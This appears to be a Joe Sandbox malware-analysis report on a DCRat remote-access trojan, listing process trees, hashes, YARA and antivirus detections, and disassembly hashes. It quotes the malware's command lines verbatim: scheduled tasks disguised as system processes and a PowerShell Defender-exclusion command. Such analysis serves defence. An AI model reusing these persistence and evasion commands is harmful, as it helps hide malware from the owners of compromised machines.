                                    • Detection: 92%, ReversingLabs
                                    • Detection: 68%, Virustotal
                                    Reputation:low
                                    Has exited:false

                                    Target ID:3
                                    Start time:05:51:56
                                    Start date:06/08/2024
                                    Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                    Imagebase:0xf00000
                                    File size:1'588'999 bytes
                                    MD5 hash:81A0B6CE5163BE692566FFA70F8E9839
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 70%, ReversingLabs
                                    • Detection: 59%, Virustotal
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:05:51:56
                                    Start date:06/08/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"
                                    Imagebase:0xd30000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:5
                                    Start time:05:51:57
                                    Start date:06/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
                                    Imagebase:0xc50000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:05:51:57
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:05:51:57
                                    Start date:06/08/2024
                                    Path:C:\Componenthost\providerreviewdhcp.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Componenthost\providerreviewdhcp.exe"
                                    Imagebase:0x850000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1383062846.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal
                                    Reputation:low
                                    Has exited:true

                                    Target ID:20
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:21
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:22
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:23
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
                                    Imagebase:0x7ff760310000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:24
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:25
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:26
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f
                                    Imagebase:0x7ff70f010000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:27
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\user\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\cmd.exe
                                    Imagebase:0x100000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.1505051021.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal
                                    Has exited:true

                                    Target ID:30
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtL" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\user\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\cmd.exe
                                    Imagebase:0xd60000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1513885055.000000000312D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    Target ID:33
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Imagebase:0x840000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1482114467.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal
                                    Has exited:true

                                    Target ID:39
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Imagebase:0xa50000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.1513471393.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    Target ID:41
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
                                    Imagebase:0x3f0000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1518454359.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal
                                    Has exited:true

                                    Target ID:42
                                    Start time:05:52:01
                                    Start date:06/08/2024
                                    Path:C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
                                    Imagebase:0xf00000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    Target ID:43
                                    Start time:05:52:01
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat"
                                    Imagebase:0x7ff660590000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:45
                                    Start time:05:52:01
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e25e45da47a26e574d010c0bb7ee64ca835060570989982d59ee1f1310838d2f
                                      • Instruction ID: f7813ec2bb619d598022d576581af25caa33536d11a04ad1dba64be46921b537
                                      • Opcode Fuzzy Hash: e25e45da47a26e574d010c0bb7ee64ca835060570989982d59ee1f1310838d2f
                                      • Instruction Fuzzy Hash: 3BD19F34E189198FDB98EB68C46867977E2FF59311F200239E41ED32E6CE39AC11CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8[$ZP^I
                                      • API String ID: 0-2417029038
                                      • Opcode ID: 0dfed62a44d7e8b90fd4731efa3515d26096ec30bb90e43c5c64f630e52540ed
                                      • Instruction ID: 6ea4d390d965c7d58531c652bb0a432091bd64a40c041c8b270acfd5acaffd3b
                                      • Opcode Fuzzy Hash: 0dfed62a44d7e8b90fd4731efa3515d26096ec30bb90e43c5c64f630e52540ed
                                      • Instruction Fuzzy Hash: 80412B12E0D6914FE25566BC78191F56F91FF62A94B6800BBD08CCB1DBED0C9C5BC392
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3CL_^
                                      • API String ID: 0-3907758863
                                      • Opcode ID: 645104ea70e9f80286c80103104868d90bec54bffe4ed634f73d64141135a361
                                      • Instruction ID: b8527487a23124118c9cc4ab93a3f0faca9514066740527eb25073283724e3f6
                                      • Opcode Fuzzy Hash: 645104ea70e9f80286c80103104868d90bec54bffe4ed634f73d64141135a361
                                      • Instruction Fuzzy Hash: 2D41B552D0E6C24FE356567858292B87FA0BFA2394F6804FBC0898B4D3DD5D9C69C362
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3CL_^
                                      • API String ID: 0-3907758863
                                      • Opcode ID: cdfbe60dfe9dad1a80e56352b879efa94563de43072105efe826bc71a858f897
                                      • Instruction ID: 4af7326b18f1c9a207e4521af53d0a49841c0099bea0a99c4d45d9f51b7172d2
                                      • Opcode Fuzzy Hash: cdfbe60dfe9dad1a80e56352b879efa94563de43072105efe826bc71a858f897
                                      • Instruction Fuzzy Hash: AA219F11C1E6C24FE366667884292B82FA0BF92394F6800FAC0498B5D3DD1D6CA9C362
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8[
                                      • API String ID: 0-4235616482
                                      • Opcode ID: 9bedeebeab0cdde53fad1cd7a7857638923543d0c284a888334428217024abcf
                                      • Instruction ID: 8aeaa2b02bb55857e03d090efaf9f2c61b0a8d5c19430404dc0209e6a57d2b25
                                      • Opcode Fuzzy Hash: 9bedeebeab0cdde53fad1cd7a7857638923543d0c284a888334428217024abcf
                                      • Instruction Fuzzy Hash: 77016812F1C9490BE3D8A6BC68597F57BC1EFAA290F0402BAD40CC32C6DE0C9C46C351
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8[
                                      • API String ID: 0-4235616482
                                      • Opcode ID: 6d59c2562affa0840f0c996ad3adf939b5c810f5c3feb14dbd704e0822f6ef71
                                      • Instruction ID: ac8152a4eee1709930661cd5a0b1e9f63ff7f7b26abfa69db372f3bcf29e4037
                                      • Opcode Fuzzy Hash: 6d59c2562affa0840f0c996ad3adf939b5c810f5c3feb14dbd704e0822f6ef71
                                      • Instruction Fuzzy Hash: 1CF0C812F18C1D0BF7E8B5EC24593F563C1EBE9695F54027AE40DC3285ED0D5C468391
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5def59a8665a042c8e1390b0cfb7cdd7b8d3ae0ca6c435ba8547e59e0b06696c
                                      • Instruction ID: 223ff61c495ab0f822fb20f176f527f3539cf757a5331af0de5fde7cbc763f39
                                      • Opcode Fuzzy Hash: 5def59a8665a042c8e1390b0cfb7cdd7b8d3ae0ca6c435ba8547e59e0b06696c
                                      • Instruction Fuzzy Hash: 1D510561E1CA858FE799DB7C48593B47BE2FFA9640F5901BAD04DC32D3DE289C818352
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6062b6ad50c33c92c48416bca37f62be27b27d394cd542f91eaea944068b692
                                      • Instruction ID: 4079baf7d70ec7ac4d4b9d5dadb28e1fe02826a1d592725dcdcd17a41bd2c061
                                      • Opcode Fuzzy Hash: f6062b6ad50c33c92c48416bca37f62be27b27d394cd542f91eaea944068b692
                                      • Instruction Fuzzy Hash: A8510571E28A498BE798DF6C585D3B977E2FFA8680F584179D04DD33D2DE289C818342
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 717a925b22a2165d19221a5c8b11bf787211c79504475f2fb05f7a454a940953
                                      • Instruction ID: f3a0dc4e3612391a97eb2ebcc34f07c0faa3b20144b5bab6c8f455fff6b46ef6
                                      • Opcode Fuzzy Hash: 717a925b22a2165d19221a5c8b11bf787211c79504475f2fb05f7a454a940953
                                      • Instruction Fuzzy Hash: AFF05802C4E3D11FE3A7537828210E4BF70AE4326471D00FBC0888A09BD8095C8AC3A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c93ace3e5da228faa399226505c36bb0a56dd5d67177bfc5ea9083094dba924a
                                      • Instruction ID: a0b88f03b8520a12f9dddcc32d238ba71acf4bb40443dd84e3f3140d6a4a2adb
                                      • Opcode Fuzzy Hash: c93ace3e5da228faa399226505c36bb0a56dd5d67177bfc5ea9083094dba924a
                                      • Instruction Fuzzy Hash: FDE02B11E2EA984FD3E2D63C58551A92FF1EF8655075902EBD44EC71D3CD284C178340
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c769cceeaab1c5788f2d2f38ed9cfea9b2d5d31623fac7323c8348fe1f3453e8
                                      • Instruction ID: 10112e42564e68340d640955571269014a520136d66d69748890423cbab3d178
                                      • Opcode Fuzzy Hash: c769cceeaab1c5788f2d2f38ed9cfea9b2d5d31623fac7323c8348fe1f3453e8
                                      • Instruction Fuzzy Hash: 5FE0C220A28A2547AB88F6589841EB9B3C2EBA4394B440028F80DD7286DD1CEE8187D2

                                      Execution Graph

                                      Execution Coverage: 18.4%
                                      Dynamic/Decrypted Code Coverage: 100%
                                      Signature Coverage: 0%
                                      Total number of Nodes: 3
                                      Total number of Limit Nodes: 0
                                      execution_graph 4282 7ff886ed2bd9 4283 7ff886ed2bff RtlSetProcessIsCritical 4282->4283 4285 7ff886ed2cb2 4283->4285

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 277 7ff886ed2bd9-7ff886ed2cb0 RtlSetProcessIsCritical 281 7ff886ed2cb2 277->281 282 7ff886ed2cb8-7ff886ed2ced 277->282 281->282
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.3776491132.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ff886ed0000_javaclient.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: a52933192cbe1921031b6178dfb43a21d8ae2b8a9cc01b9aef1d15971f08df08
                                      • Instruction ID: 155f0e0dcd611f5e4915688e023810f5710749cd9cb5b0a965b5103da9b2e8f3
                                      • Opcode Fuzzy Hash: a52933192cbe1921031b6178dfb43a21d8ae2b8a9cc01b9aef1d15971f08df08
                                      • Instruction Fuzzy Hash: 7241E33180C6588FD719DF98D845BE9BBF0FF56311F14416ED08AD3592CB68A846CB91

                                      Execution Graph

                                      Execution Coverage: 9.9%
                                      Dynamic/Decrypted Code Coverage: 0%
                                      Signature Coverage: 5.2%
                                      Total number of Nodes: 1514
                                      Total number of Limit Nodes: 36
